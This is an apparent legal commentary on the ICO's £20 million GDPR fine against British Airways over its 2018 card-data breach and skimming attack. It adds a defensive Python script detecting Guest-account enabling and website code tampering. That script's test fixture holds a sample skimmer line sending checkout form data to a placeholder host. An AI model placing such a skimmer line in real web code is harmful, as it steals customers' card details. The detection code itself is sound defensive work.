The Information Commissioner had originally served a Notice of Intent to fine BA £183.39 million. The final fine would have been £30 million but was reduced by 20% to £24 million to take account of mitigating factors, including later improvements to security and BA’s offer to reimburse any losses suffered by customers.
The fine was then further reduced to £20 million in light of the Commissioner’s Covid-19 related regulatory action policy amendments. The penalty notice was served on 16th October 2020. The breach affected nearly 430,000 data subjects and related to a security breach lasting from 22nd June to 5th September 2018.
Controllers must protect against attackers; anticipate attempts to break out of Citrix environments; avoid storing passwords in plaintext; have processes in place to mitigate risks from accounts with privileged access rights; implement measures to detect unauthorised activity – including attempts to activate guest accounts in Windows and changes to website code; and have effective review processes for moving from a development to a live environment.
The breach involved access to stored credit card data and “skimming” of credit card data from BA’s website. The attacker used compromised credentials for an employee of Swissport, who had access rights to BA’s systems, to log into BA’s systems. The attacker then broke out of the Citrix environment accessible to the Swissport employee and accessed other BA systems. This included accessing usernames and passwords of privileged domain administrators and a system administrator. Using these credentials, the attacker exfiltrated credit card data from BA’s systems in two ways. First, the attacker found a record of credit card details and CVV numbers stored in plaintext. This record had been inadvertently created when BA carried out testing on a new feature and did not decommission a debugging script when the feature went live. Second, the attacker “skimmed” credit card data from britishairways.com by redirecting traffic to BAways.com. BA was notified of the redirection on 5th September 2018. It contained the vulnerability within 90 minutes of receiving notice and blocked the redirection within a further 20 minutes. In total, data relating to 429,612 individuals worldwide was affected, although not all of this included credit card data. Name, address, credit card number and CVV number were exfiltrated for 244,000 individuals.
The Commissioner acknowledged that not every breach of security would amount to a breach of the GDPR and that she should not reason solely with the benefit of hindsight. The penalty notice describes her role as focusing on whether the controller implemented adequate and appropriate security measures; what risks were known or could reasonably have been known at the time; and determining whether there was a failure to put appropriate measures in place.
The Commissioner found multiple failings:
- BA had failed to take appropriate measures to mitigate the risk of an attacker being able to access its network. BA’s own network access policy stated that it should have deployed multi-factor authentication to mitigate this risk; while this was in place for access to most systems, it was missing here. Alternatively, the Commissioner said that BA could have ensured that access was only permitted from whitelisted public IP addresses or could have deployed an IPsec VPN.
- BA had failed to take appropriate measures to prevent unauthorised users from breaking out of the Citrix environment; the Commissioner referred to literature from Citrix to show that this was a known risk. The Commissioner suggested that BA could have deployed any of application whitelisting, denying access from blacklisted applications, or application or server hardening to achieve this objective.
- BA should not have stored passwords in plaintext: the measures suggested by the Commissioner included some which, although they would not have prevented unauthorised access, would have allowed for earlier detection of the problem.
- Failings in the way BA managed its system administrator account – this part of the decision is heavily redacted.
- Failure to implement measures to prevent the attacker enabling a Guest Account in Windows – although Guest Accounts had been disabled, BA did not then monitor attempts to enable these accounts.
- Insufficient measures to detect unauthorised activity – in particular, insufficient activity logging.
- Failure to remove functions (here a debugging script) when BA moved from a development to a production environment: BA did undertake a manual code review, but this was undertaken purely to check that the code was operating as expected; there were no checks to ensure that additional, appropriate security measures were in place.
- BA should have had monitoring systems in place which would have detected changes to its website code. Although this wouldn’t have prevented the redirection, it would have allowed earlier detection.
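Two of the detective controls the Commissioner said were missing lend themselves to a short worked example: alerting when a disabled Windows Guest account is re-enabled, and noticing when deployed website code changes. The script below is an added illustration and is not taken from the penalty notice, from BA or from the ICO. The Windows Security event ID 4722 (“A user account was enabled”) and the Guest account’s relative identifier 501 are real Windows values; the JSON-style field names, the sample events and the sample JavaScript files are constructed for the example, and the skimmer host in the tampered file is a placeholder.

```python
"""Added example: two detective controls the Commissioner said were missing.

1. Alert when the built-in Windows Guest account is enabled (Security event
   4722, "A user account was enabled", target SID ending in RID 501).
2. Detect changes to deployed website code by comparing SHA-256 hashes
   against a baseline taken at release time.

All sample events and files below are constructed for illustration; the
field names follow a JSON export of Security log records and are an
assumption, not a fixed format.
"""
import hashlib

ACCOUNT_ENABLED = 4722   # Windows Security: "A user account was enabled"
GUEST_RID = "501"        # relative identifier of the built-in Guest account


def guest_enable_alerts(events):
    """Return every 4722 event whose target account is a built-in Guest (RID 501).

    Matching on the RID rather than the name "Guest" still catches a renamed
    Guest account, which is a common hardening step and a common evasion.
    """
    alerts = []
    for ev in events:
        if ev.get("EventID") != ACCOUNT_ENABLED:
            continue
        rid = str(ev.get("TargetSid", "")).rsplit("-", 1)[-1]
        if rid == GUEST_RID:
            alerts.append(ev)
    return alerts


def baseline_hashes(assets):
    """Map each deployed asset path to the SHA-256 hex digest of its content."""
    return {path: hashlib.sha256(body).hexdigest() for path, body in assets.items()}


def changed_assets(baseline, current):
    """Return the sorted paths that were modified, added or removed since the baseline."""
    changed = set()
    for path, body in current.items():
        if baseline.get(path) != hashlib.sha256(body).hexdigest():
            changed.add(path)                        # modified, or newly added
    changed.update(set(baseline) - set(current))     # removed since release
    return sorted(changed)


# --- constructed sample data -------------------------------------------------

SAMPLE_EVENTS = [
    {"EventID": 4624, "SubjectUserName": "svc_citrix",
     "TargetSid": "S-1-5-21-1111-2222-3333-1105"},            # a logon; not interesting
    {"EventID": 4722, "SubjectUserName": "jdoe", "TargetUserName": "newstarter",
     "TargetSid": "S-1-5-21-1111-2222-3333-1203"},            # ordinary account enabled
    {"EventID": 4722, "SubjectUserName": "ext_contractor", "TargetUserName": "Visitor",
     "TargetSid": "S-1-5-21-1111-2222-3333-501"},             # renamed Guest enabled
]

DEPLOYED = {
    "js/checkout.js": b"function submitPayment(form) { post('/api/pay', serialize(form)); }\n",
    "js/vendor.js": b"/* vendor bundle */\n",
}

# The same files after a skimmer line is appended to the checkout script;
# the exfiltration host is a placeholder, not a real domain.
TAMPERED = dict(DEPLOYED)
TAMPERED["js/checkout.js"] = DEPLOYED["js/checkout.js"] + (
    b"window.onsubmit = function(e) { "
    b"navigator.sendBeacon('https://skimmer.invalid/c', serialize(e.target)); };\n"
)


def run_checks(events=SAMPLE_EVENTS, deployed=DEPLOYED, current=TAMPERED):
    """Run both detections; returns (who enabled a Guest account, changed asset paths)."""
    who = [e["SubjectUserName"] for e in guest_enable_alerts(events)]
    return who, changed_assets(baseline_hashes(deployed), current)


if __name__ == "__main__":
    who, changed = run_checks()
    print("Guest account enabled by:", who)
    print("Website assets changed since release:", changed)
```

In practice the first check would be fed from the domain controllers’ Security logs (or a SIEM query on event 4722) and the second would run on a schedule against the web tier, with the baseline refreshed only as part of the release process; an unexplained hit on either is exactly the kind of signal the Commissioner criticised BA for not having.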
BA is facing group litigation in relation to the incident – and the findings of fault in the Commissioner’s monetary penalty notice will be helpful to the claimants there.
Breaches of security can trigger the higher, 4% fine – turnover is assessed by reference to the revenue of the controller responsible for the breach, not that of a parent company which is not the responsible controller.
Readers who know their GDPR by heart will know that the obligation to implement appropriate technical and organisational measures is set out in Art. 32 GDPR – for which the maximum fine is 2% of worldwide turnover or €10 million, whichever is higher. However, the GDPR also refers to an obligation to implement appropriate security in Article 5(1)(f) – among the data protection principles applicable to controllers – for which the maximum fine is 4% or €20 million.
ICO found BA to be in breach of Article 5(1)(f) – thus allowing the higher cap to be applied (although the actual penalty imposed is, in any event, within the lower amount).
BA is a subsidiary of International Consolidated Airlines Group S.A. ICO concluded that BA was the controller here and looked to BA’s turnover in assessing the penalty, not the turnover of its parent.
Relevant factors in setting and reducing the fine
The final decision notice doesn’t explain how the Commissioner arrived at the revised figure of £30 million. The penalty notice shows that BA argued (unsuccessfully) that the lack of clear guidance from the Commissioner as to the amount of a penalty that would be imposed should prevent the Commissioner from being able to impose any penalty – or should restrict her to pre-GDPR levels.
Mitigating factors included later investment in better security, the fact that BA carried out detailed customer outreach, made information available swiftly via the press, engaged with card issuers and offered to reimburse losses.
The Commissioner rejected arguments by BA that she relied too heavily on turnover to set the fine and that – by comparison with fines levied by other EEA authorities – this was too high. Unsurprisingly, she also rejected the argument from BA that security breaches involving credit card data are so commonplace that it was not credible for the Commissioner to assert, as a factor in setting the penalty, that cardholders would have suffered some distress. Readers may be interested to note that the Commissioner relied on an ENISA methodology to assess the severity of the breach.